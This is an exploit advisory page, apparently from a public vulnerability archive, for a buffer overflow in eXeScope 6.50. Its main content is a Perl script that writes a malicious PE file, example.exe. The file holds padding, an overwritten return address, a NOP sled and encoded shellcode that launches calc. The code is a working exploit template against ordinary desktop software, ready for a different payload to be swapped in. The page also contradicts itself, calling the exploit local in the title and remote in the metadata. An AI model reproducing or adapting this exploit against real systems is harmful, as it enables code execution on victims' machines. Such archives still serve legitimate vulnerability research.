eXeScope 6.50 Local Buffer Overflow Exploit

2009.03.28
Credit: Koshi
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl # # eXeScope 6.50 Local Buffer Overflow Exploit # # Download eXeScope 6.50 at: # http://hp.vector.co.jp/authors/VA003525/eXeSc650.zip # # Exploit by: Koshi ( heykoshi@gmail.com ) # use strict; use warnings; my $headers = "\x4D\x5A\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xFF\xFF\x00\x00". "\xB8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xB8\x00\x00\x00". "\x0E\x1F\xBA\x0E\x00\xB4\x09\xCD\x21\xB8\x01\x4C\xCD\x21\x54\x68". "\x69\x73\x20\x70\x72\x6F\x67\x72\x61\x6D\x20\x63\x61\x6E\x6E\x6F". "\x74\x20\x62\x65\x20\x72\x75\x6E\x20\x65\x69\x74\x68\x65\x72\x20". "\x77\x61\x79\x21\x21\x0D\x0D\x0A\x24\x00\x00\x00\x00\x00\x00\x00". "\x8F\x8A\xF9\xDB\xCB\xEB\x97\x88\xCB\xEB\x97\x88\xCB\xEB\x97\x88". "\x48\xF7\x99\x88\xCA\xEB\x97\x88\xA2\xF4\x9E\x88\xCA\xEB\x97\x88". "\x22\xF4\x9A\x88\xCA\xEB\x97\x88\x52\x69\x63\x68\xCB\xEB\x97\x88". "\x00\x00\x00\x00\x00\x00\x00\x00\x50\x45\x00\x00\x4C\x01\xFF\x00". "\xAB\xBA\x5C\x49\x00\x00\x00\x00\x00\x00\x00\x00\xE0\x00\xF0\x01". "\x00"x224; # win32_exec - EXITFUNC=process CMD=calc Size=161 Encoder=ShikataGaNai http://metasploit.com my $shellcode = "\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23". "\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0". "\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3". "\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f". "\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4". "\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2". "\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba". "\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f". "\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56". "\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9". "\xe4"; my $buff0 = "A"x4148; my $eip = "\x58\x32\x4D\x00"; # 004d3258 - eXeScope.exe my $sled = "\x90"x20; my $len = 6028 - length($shellcode); my $buff1 = "A"x$len; my $datas = $headers.$buff0.$eip.$sled.$shellcode.$buff1; open(my $files, "> example.exe"); binmode $files; print $files $datas; close($files);

References:

http://www.securityfocus.com/bid/34219
http://www.milw0rm.com/exploits/8270


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top